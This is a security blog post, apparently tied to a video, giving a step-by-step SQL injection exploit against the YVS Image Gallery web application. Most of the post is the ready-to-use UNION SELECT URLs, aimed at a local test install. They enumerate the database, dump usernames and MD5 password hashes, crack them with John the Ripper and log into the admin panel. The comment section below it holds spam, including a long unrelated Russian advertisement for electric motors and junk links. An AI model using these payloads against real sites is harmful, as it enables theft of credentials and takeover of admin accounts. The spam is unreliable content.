rss
twitter
  •  

[VIDEO] YVS Image Gallery – SQL Injection

| Posted in Security Videos |

6

  • Sumo

Download video: http://www.mediafire.com/?mbf1l0ql1514dq3

Brief Overview

 YVS Image Gallery is a small database driven gallery created to be implemented within your existing site. Only a first attempt at the system has a long way to go, but it provides you with all the necessary tools to run your own picture gallery, such as uploading of multiple images and creation of thumbnails.
As reported by Corrado Liotta, YVS Image Gallery is vulnerable to SQL Injection. So basically what I did was to exploit this vulnerability.

 Tools

Commands

//Open on firefox
http://127.0.0.1/server_path/view_all_albums.php
//Check the column count
http://127.0.0.1/YVS1/view_album.php?album_id=1+order+by+1--
http://127.0.0.1/YVS1/view_album.php?album_id=1+union+select+1--

//Get the version, current user and the database name
http://127.0.0.1/server_path/view_album.php?album_id=-2+UNION+SELECT+concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)--

//Get all the tables in the database
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(table_name)+FROM+information_schema.tables+where+table_schema=database()--
//Get all the column names
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(column_name)+FROM+information_schema.columns+where+table_schema=database()--
//Get username & password from the table "user"
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+concat(username,0x3a,password)+from+user--
//The password is md5 encrypted, so we have to decrypt it
//We save the username:hash in a file and name it "pwd.txt"
//We open up a terminal on our backtrack
//We need to Brute Force the user credentials for the web application using John The Ripper
cd pentest/passwords/john
./john pwd.txt --wordlist=password.txt --format=raw-MD5
//where password.txt is our password wordlist
//John the ripper then cracks the hash and gives us the password
//After which we then login to the YVS Image Gallery admin panel

 #####                          #######
#     #   ##   #    # ######    #     # #    # ###### #####
#        #  #  ##  ## #         #     # #    # #      #    #
#  #### #    # # ## # #####     #     # #    # #####  #    #
#     # ###### #    # #         #     # #    # #      #####
#     # #    # #    # #         #     #  #  #  #      #   #
 #####  #    # #    # ######    #######   ##   ###### #    #

@InfosecShinobi

Comments (6)

men i dont understand this page, but i love this lil bird that keeps jumping branches as i scroll down 🙂

Have you seen the video embedded? Meanwhile bring some seeds for the birdie 😉

Neat trick with the birdie, so much I inspected it on Google Chrome’s Inspected the hit ‘delete’. 😀

Search VPN? Here – http://importplan.ru

Vomit Porn video

ДВИГАТЕЛИ АДЧР

Электродвигатели асинхронные АДЧР
Асинхронные электродвигатели, частота вращения вала которых принудительно изменяется до определенного значения под воздействием частотного преобразователя, называются электродвигателями АДЧР.

Аббревиатура АДЧР :

АД – асинхронный электродвигатель

ЧР – частотно регулируемый

При этом частота вращения вала может существенно меняться от номинального значения, в зависимости от производственной задачи, решение которой необходимо выполнить. По другому выражаясь, электродвигатели АДЧР работают с разной частотой тока, от номинальной в 50 Гц до нужного минимального значения. От этого и идет название «частотно-регулируемый» электродвигатель переменного тока АДЧР.

По сути дела это такой же общепромышленный электродвигатель стандарта ГОСТ или DIN, но оснащенный необходимым дополнительным оборудованием, предназначенным для корректной работы от частотного привода. http://www.uesk.org/katalog/elektrodvigateli/dvigateli-adchr/adchr180s2/ Опции двигателя АДЧР:
Первым необходимым условием является установка на мотор узла принудительной вентиляции. В штатном варианте на общепромышленный двигатель вентилятор устанавливается на вал, когда же обороты двигателя меняются в результате воздействия преобразователя частоты, штатного узла вентиляции будет недостаточно что бы его охладить. По этой причине установка независимой вентиляции крайне необходима для стабильной работы мотора без перегрева.
Дополнительно в такие моторы устанавливаются термодатчики в обмотку статора и в подшипниковые узлы с последующим их подключением к автоматике. Это делается для того, что бы иметь возможность отслеживать температуру в узлах агрегата и при необходимости принять соответствующие меры во избежание поломки мотора.
Начиная от двигателей 280 габарита или мощности свыше 110 кВт, необходимо установить токоизолированные подшипники, либо в оба подшипниковых узла, либо в узел с не приводной стороны в зависимости от мощности мотора и глубины регулировки частоты тока.
Дополнительной опцией является установка энкодера (датчик положения вала). Энкодер преобразует угол вращения вала в электрический сигнал, позволяющий определить угол поворота вала двигателя.
При определении необходимых опций для комплектации электродвигателя АДЧР в обязательном порядке при заказе мотора заполняется опросный лист, в котором отражены все технические параметры, при которых будет работать агрегат.

Опросный лист можно скачать по этой ссылке

Post a comment